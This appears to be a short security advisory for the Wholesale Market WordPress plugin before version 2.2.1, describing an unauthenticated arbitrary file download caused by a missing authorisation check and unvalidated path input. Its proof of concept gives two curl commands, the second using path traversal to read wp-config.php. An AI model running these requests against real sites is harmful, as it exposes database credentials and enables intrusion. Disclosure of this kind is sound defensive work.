Wholesale Market < 2.2.1 - Unauthenticated Arbitrary File Download

The plugin does not have authorisation check, as well as does not validate user input used to generate system path, allowing unauthenticated attackers to download arbitrary file from the server.

PoC

1. Install woocommerce (dependency, no setup required) 2. Install the vulnerable plugin (wholesale-market) 3. Invoke the following curl command to ensure the required uploads directory exists: (This creates /var/www/html/wp-content/uploads/wholesale_market_import_error/) curl -i ‘http://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csv’ 4. Invoke the following curl command to disclose the contents of the wp-config.php file: curl -i ‘https://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&amp;tab;=ced_cwsm_plugin&amp;section;=ced_cwsm_csv_import_export_module&amp;ced;_cwsm_log_download=../../../wp-config.php’